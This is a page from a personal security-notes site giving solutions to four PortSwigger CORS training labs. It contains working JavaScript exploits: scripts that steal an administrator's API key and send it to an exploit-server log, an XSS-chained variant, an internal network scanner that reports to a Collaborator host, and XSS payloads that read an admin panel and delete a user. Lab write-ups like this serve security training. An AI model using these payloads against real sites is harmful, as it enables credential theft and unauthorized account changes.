sec-notes
  • Whoami
  • WEB-Pen
    • Reconnaissance
    • Enumeration
    • Cross Site Scripting
      • Cross Site Scripting
      • Exploitation
      • Protections
    • SQL Injection
      • SQL Injection Overview
    • CORS Miscofigration
    • Path Traversal
    • CSRF
    • NoSQL Injection
    • JWT Hacking
    • GraphQL Vulnerabilities
    • Link Following
    • PostMessage Vulnerabilities
      • PostMessage Vulnerabilities
      • Blocking main page to steal postmessage
      • Bypassing SOP with Iframes - part 1
      • Bypassing SOP with Iframes - part 2
      • Steal postmessage modifying iframe location
    • Checklists
      • 2FA bypass
      • admin panal
      • Authentication
      • bussiness logic
      • 403 bypass
      • idor
      • reset_password_checklist
      • mass assignment
      • aem misconfiguration
      • ATO
      • csrf
      • exif_geo
      • xss
      • Session Management
      • Authorization
      • cookie
      • Django
      • Symfony
      • json
      • bypass rate limit
      • Rce
      • Register Page
    • All Portswigger Labs solution
      • Path Traversal
      • CSRF
      • CORS
    • Incorrect Default Permissions
  • API-Pen
    • API Discovry
    • Reverse Engineering API Documentation
    • Excessive Data Exposure
    • Vulnerability Scanning
    • API Authentication Attacks
      • Classic Authentication Attacks
      • API Token Attacks
    • API Authorization Attacks
      • Broken Object Level Authorization (BOLA)
      • Broken Function Level Authorization
    • Improper Assets Management
    • Mass Assignment
    • SSRF
    • Injection Attacks in API
    • Evasive Maneuvers
  • AD-Pen
    • Active Directory Components
    • Initial Attack Vectors
      • LLMNR Poisoning
      • SMB Relay Attacks
      • IPv6 Attacks ( IPv6 DNS Takeover )
      • Printer Hacking
      • Methodology
      • Some Other Attacks
        • Zerologon (CVE-2020-1472)
        • PrintNightmare (CVE-2021-1675)
    • Post-Compromise Attacks
      • Pass Attacks
      • Kerberoasting Attack
      • Token Impersonation Attack
      • LNK File Attack
      • GPP / cPassword Attacks
      • Mimikatz
      • Methodology
    • We've Compromised the Domain
      • Dumping the NTDS.dit
      • Golden Ticket Attacks
      • Methodology
    • Case Study
  • NET-Pen
    • Attack Vectors by Port
      • FTP 21
      • SSH 22
      • Telnet 23 - 2323
      • SMTP 25
      • DNS 53
      • Kerberos 88
      • POP 110-995
      • RPC 111
      • Ident 113
      • NNTP 119
      • NetBIOS 137-138
      • SMB / Samba 135-139, 445
      • MSRPC 135
      • SNMP 161
      • LDAP 389,636
      • Modbus 502
      • OpenSSL 1337
      • Ms-SQL 1433
      • Oracle Listener 1521 1522 1529
      • NFS 2049
      • MySql 3306
      • RDP 3389
      • ADB Android Debug Bridge 5555
      • WinRM 5985 5986
      • VNC 5800 5900
      • Redis 6379
      • Unreal IRC 6667
      • Tomcat 8080
      • MongoDB 27017
      • http 80
    • Network basics
    • Information Gathering
    • Privilege Escalation
      • Windows Privilege Escalation
      • Linux Privilege Escalation
    • Password Attacks
  • write-ups
    • How i found a Privilege Escalation via Impersonation Features feature
    • How I Bypassed SAML Authentication, Leading to Admin Panel Access.
    • How I was able to discover ATO Via IDOR vulnerability
    • Easy full Account Takeover via Facebook OAuth Misconfiguration
Powered by GitBook
On this page
  • Lab: CORS vulnerability with basic origin reflection
  • Lab: CORS vulnerability with trusted null origin
  • Lab: CORS vulnerability with trusted insecure protocols
  • Lab: CORS vulnerability with internal network pivot attack
  1. WEB-Pen
  2. All Portswigger Labs solution

CORS

PreviousCSRFNextIncorrect Default Permissions

Last updated 5 days ago

Lab: CORS vulnerability with basic origin reflection

Starting the lab “CORS vulnerability with basic origin reflection” , in the lab description it is specified that the lab has an insecure CORS configuration.To solve this lab we have to retrieve administrator’s API key.

Setting Origin header in the request , such as https://test.com then sending the request and found Access-Control-Allow-Origin header in the response.

Due to the misconfigured CORS policies on the website , a script can be created to makes a cross-origin request to the target website and retrieve administrator’s API key.

<script>
var req = new XMLHttpRequest();
var url = "https://0a2e006d033cd3b181ca985900980032.web-security-academy.net"
req.onreadystatechange = function() {
        if (req.readyState == XMLHttpRequest.DONE){
        fetch("/log?key=" + req.responseText)
         }
        }
req.open('GET', url + "/accountDetails", true);
req.withCredentials = true;
req.send(null)
</script>

Delivering this script to the victim and then accessing the log.

Lab: CORS vulnerability with trusted null origin

Starting the second lab “CORS vulnerability with trusted null origin”. Just like the fist lab our objective remain the same to retrieve Administrator’s API key.

When setting Origin header to a specific URL but not receiving the Access-Control-Allow-Origin header in the response.

Setting Origin header to null in the request then , we observe the presence of Access-Control-Allow-Origin header in the response.

<iframe style="display: none;" sandbox="allow-scripts" srcdoc="
<script>
var req = new XMLHttpRequest();
var url = 'https://0afc003c0370951481530238001700c4.web-security-academy.net'
req.onreadystatechange = function() {
        if (req.readyState == XMLHttpRequest.DONE){
        fetch('https://exploit-0a08003e03a595cd81600195011000b5.exploit-server.net/exploit/log?key=' + req.responseText)
         }
        }
req.open('GET', url + '/accountDetails', true);
req.withCredentials = true;
req.send(null);
</script>"></iframe>

The <iframe> tag is used in this context to create an invisible container within the web page where the script can execute without being visible to the user.

Lab: CORS vulnerability with trusted insecure protocols

Starting the third lab “CORS vulnerability with trusted insecure protocols”. Just like the fist and lab our objective remain the same to retrieve Administrator’s API key.

When setting Origin header to a specific URL as well as to null but not receiving the Access-Control-Allow-Origin header in the response.

But when Origin header is set in this way “https://test.0ad800f00471924f82d91fd700c9002d.web-security-academy.net” , the response includes the Access-Control-Allow-Origin header , indicating that the server trusts requests only from its own domain.

If you encounter this scenario, you need to check all the existent subdomains and try to find one with an XSS vulnerability to exploit it.

There is an XSS vulnerability in the productId parameter.

<script>
            document.location="http://stock.0ad800f00471924f82d91fd700c9002d.web-security-academy.net/?productId=<script>var req = new XMLHttpRequest();var url = 'https://0ad800f00471924f82d91fd700c9002d.web-security-academy.net';req.onreadystatechange = function(){if (req.readyState == XMLHttpRequest.DONE) {fetch('https://exploit-0afd006a041b923982861ede01bc00ff.exploit-server.net/exploit/log?key=' %2b req.responseText)};};req.open('GET', url %2b '/accountDetails', true); req.withCredentials = true;req.send(null);%3c/script>&storeId=1"
</script>

Lab: CORS vulnerability with internal network pivot attack

The last lab “CORS vulnerability with internal network pivot attack”. In the lab description it is specified the task of discovering an endpoint on the local network (192.168.0.0/24, port 8080)and then delete user ‘Carlos’.

Using the collaborator in the java script to gather data without being noticed.

<script>
var q = [], collaboratorURL = 'http://fveghhut3of7yx5q3m3f279dg4mwamyb.oastify.com';

for(i=1;i<=255;i++) {
    q.push(function(url) {
        return function(wait) {
            fetchUrl(url, wait);
        }
    }('http://192.168.0.'+i+':8080'));
}

for(i=1;i<=20;i++){
    if(q.length)q.shift()(i*100);
}

function fetchUrl(url, wait) {
    var controller = new AbortController(), signal = controller.signal;
    fetch(url, {signal}).then(r => r.text().then(text => {
        location = collaboratorURL + '?ip='+url.replace(/^http:\/\//,'')+'&code='+encodeURIComponent(text)+'&'+Date.now();
    }))
    .catch(e => {
        if(q.length) {
            q.shift()(wait);
        }
    });
    setTimeout(x => {
        controller.abort();
        if(q.length) {
            q.shift()(wait);
        }
    }, wait);
}
</script>

The IP address is 192.168.0.113:8080

Looking for XSS vulnerability.

<script>
function xss(url, text, vector) {
    location = url + '/login?time='+Date.now()+'&username='+encodeURIComponent(vector)+'&password=test&csrf='+text.match(/csrf" value="([^"]+)"/)[1];
}

function fetchUrl(url, collaboratorURL){
    fetch(url).then(r => r.text().then(text => {
        xss(url, text, '"><img src='+collaboratorURL+'?foundXSS=1>');
    }))
}

fetchUrl("http://192.168.0.113:8080", "http://http://fveghhut3of7yx5q3m3f279dg4mwamyb.oastify.com");
</script>

Now accessing Admin page through xss.

<script>
function xss(url, text, vector) {
    location = url + '/login?time='+Date.now()+'&username='+encodeURIComponent(vector)+'&password=test&csrf='+text.match(/csrf" value="([^"]+)"/)[1];
}

function fetchUrl(url, collaboratorURL){
    fetch(url).then(r=>r.text().then(text=>
    {
        xss(url, text, '"><iframe src=/admin onload="new Image().src=\''+collaboratorURL+'?code=\'+encodeURIComponent(this.contentWindow.document.body.innerHTML)">');
    }
    ))
}

fetchUrl("http://192.168.0.113:8080", "http://fveghhut3of7yx5q3m3f279dg4mwamyb.oastify.com");
</script>

Decoding the highlighted content.

Now deleting the user ‘carlos’.

<script>
function xss(url, text, vector) {
    location = url + '/login?time='+Date.now()+'&username='+encodeURIComponent(vector)+'&password=test&csrf='+text.match(/csrf" value="([^"]+)"/)[1];
}

function fetchUrl(url){
    fetch(url).then(r=>r.text().then(text=>
    {
    xss(url, text, '"><iframe src=/admin onload="var f=this.contentWindow.document.forms[0];if(f.username)f.username.value=\'carlos\',f.submit()">');
    }
    ))
}

fetchUrl("http://192.168.0.113:8080");
</script>

The user has been successfully deleted.